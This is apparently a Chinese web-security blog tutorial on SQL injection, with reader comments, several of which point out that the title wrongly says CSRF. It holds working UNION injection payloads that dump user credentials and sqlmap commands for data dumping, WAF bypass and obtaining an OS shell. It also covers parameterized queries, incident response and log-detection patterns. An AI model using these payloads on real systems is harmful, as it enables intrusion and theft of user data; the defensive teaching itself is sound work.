AI智能摘要
AI 生成的文章内容摘要
一、什么是 SQL 注入?
2025 年某大型电商平台遭遇 SQL 注入攻击,攻击者通过商品搜索框注入恶意 SQL 语句,获取了 50 万用户的个人信息。这并非个例,根据 Veracode 报告,46% 的应用存在 SQL 注入风险。
SQL 注入的本质:用户输入被当作 SQL 代码执行。
1.1 漏洞成因
// 危险代码示例 $userid = $_GET["id"]; $sql = "SELECT * FROM users WHERE id = $userid"; $result = mysqli_query($conn, $sql);
当用户访问 `?id=1 OR 1=1` 时,SQL 变为:
SELECT * FROM users WHERE id = 1 OR 1=1
结果:返回所有用户数据!
1.2 注入类型
| 类型 | 特点 | 检测难度 |
|---|---|---|
| 联合查询注入 | 使用 UNION 合并结果 | 容易 |
| 盲注 | 无回显,通过响应时间判断 | 中等 |
| 报错注入 | 利用数据库错误信息 | 容易 |
| 时间盲注 | 通过 SLEEP() 延时判断 | 困难 |
---
二、实战:手工检测 SQL 注入
2.1 基础测试
# 测试点:搜索框、URL 参数、表单输入 # 测试 payload ?id=1 ?id=1' ?id=1" ?id=1 AND 1=1 ?id=1 AND 1=2
判断标准:
- 页面正常 → 可能存在注入
- 报错 → 可能存在注入
- 页面异常 → 可能无注入
2.2 联合查询注入
# 判断字段数 ?id=1 ORDER BY 1-- ?id=1 ORDER BY 2-- ?id=1 ORDER BY 3-- # 当 ORDER BY 4 时报错 → 字段数为 3 # 确定显示位 ?id=-1 UNION SELECT 1,2,3-- # 页面显示 2 和 3 → 这两个是显示位 # 获取数据库信息 ?id=-1 UNION SELECT 1,database(),version()-- # 获取表名 ?id=-1 UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()-- # 获取列名 ?id=-1 UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name="users"-- # 获取数据 ?id=-1 UNION SELECT 1,group_concat(username,":",password),3 FROM users--
三、自动化:SQLMap 使用指南
3.1 基础扫描
# 检测注入点 sqlmap -u "http://target.com/page?id=1" # 获取数据库 sqlmap -u "http://target.com/page?id=1" --dbs # 获取表 sqlmap -u "http://target.com/page?id=1" -D database --tables # 获取列 sqlmap -u "http://target.com/page?id=1" -D database -T users --columns # 获取数据 sqlmap -u "http://target.com/page?id=1" -D database -T users -C username,password --dump
3.2 高级用法
# POST 注入 sqlmap -u "http://target.com/login" --data="username=admin&password=123" # Cookie 注入 sqlmap -u "http://target.com/page" --cookie="sessionid=abc123" # 绕过 WAF sqlmap -u "http://target.com/page?id=1" --tamper=space2comment # 获取 shell sqlmap -u "http://target.com/page?id=1" --os-shell
---
四、SQL 注入防御方案
4.1 参数化查询(推荐)
// ✅ 正确做法
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id");
$stmt->execute(["id" => $_GET["id"]]);
$user = $stmt->fetch();
4.2 输入验证
// 白名单验证
$allowed_ids = [1, 2, 3, 4, 5];
if (!in_array($_GET["id"], $allowed_ids)) {
die("非法参数");
}
// 类型转换 $id = intval($_GET["id"]);
4.3 ORM 框架
// Laravel Eloquent
$user = User::find($id);
// ThinkPHP $user = Db::name("users")->find($id);
---
五、应急响应:发现 SQL 注入后
5.1 紧急处置
1. 立即下线受影响页面 2. 修改数据库密码 3. 检查数据库是否被篡改 4. 分析日志确定攻击范围 5. 修复漏洞并重新上线
5.2 日志分析
# 查找 SQL 注入特征
grep -E "UNION|SELECT|AND 1=1|SLEEP(" access.log
# 统计攻击 IP grep "SELECT" access.log | awk "{print $1}" | sort | uniq -c | sort -rn
六、总结
SQL 注入防御核心:永远不要信任用户输入
防御优先级
1. 参数化查询(必须)
2. 输入验证(必须)
3. 最小权限原则(推荐)
4. WAF 防护(辅助)
---
作者:爪
分类:Web 安全
标签:SQL 注入、Web 安全、渗透测试、漏洞挖掘、安全防御
发布时间:2026-04-20
湖北省武汉市 1F
sqlmap现在还能绕waf不,感觉很多都拦了
湖北省荆州市 2F
之前搞过手工注入,确实挺费劲的,union select敲半天
北京市崇文区 3F
这代码示例看得我头皮发麻,真有人这么写啊
江苏省盐城市 4F
为啥标题是csrf啊,点进来一脸懵逼🤔
印度尼西亚 5F
参数化查询确实靠谱
韩国 6F
标题写的CSRF,内容是SQL注入,作者是不是发错文章了
河南省平顶山市 7F
orm也不是万能的,之前见过拼接的
广东省广州市 8F
盲注有没有快点的技巧,time based太慢了
湖南省长沙市 9F
还有种二次注入,文章好像没提,就是在update的时候
上海市 10F
看完还是不敢动手试,怕出事
北京市海淀区 11F
标题写错了吧,CSRF 和 SQL 注入完全是两码事啊。
广东省广州市 12F
盲注太耗时间了,有没有什么加速的小技巧?
越南 B1
@ 默默围观群众 用二分法搞盲注效率高很多,不用一个个试。
上海市 13F
这代码看着真吓人,现在还有人这么写?
上海市静安区 14F
二次注入确实坑,update 那块最容易中招。
菲律宾 15F
参数化查询是底线,别的都是辅助手段。
北京市 16F
sqlmap 绕 WAF 越来越难了,得看版本。
澳大利亚 B1
@ 天使Noah 是啊,现在的WAF都成精了,默认tamper根本过不去。
重庆市 17F
ORM 有时候也会漏,还是得自己多检查。
河北省邯郸市 B1
@ TacoSaurus 确实,有些复杂查询一用原生SQL就容易出事。
陕西省汉中市 18F
不敢乱试,怕把数据库搞崩了😭
河南省洛阳市 19F
之前手工测过,敲 UNION SELECT 手都酸了。
广东省广州市 20F
作者是不是把 CSRF 的稿子发成 SQL 的了?
北京市 21F
标题确实乌龙了,不过SQL注入这块讲得还行。
马来西亚 22F
防御这块讲得挺实在,参数化查询保平安。
广东省 23F
哎,上次手滑把测试库删了,吓出一身冷汗。
北京市 24F
那个50万数据的案例是哪年的?看着有点眼熟。
中国 25F
sqlmap –os-shell 这个现在实战里很难利用成功吧?
湖南省长沙市 26F
参数化查询确实是保命符,写代码时别偷懒啊
北京市 27F
标题是不是写错了?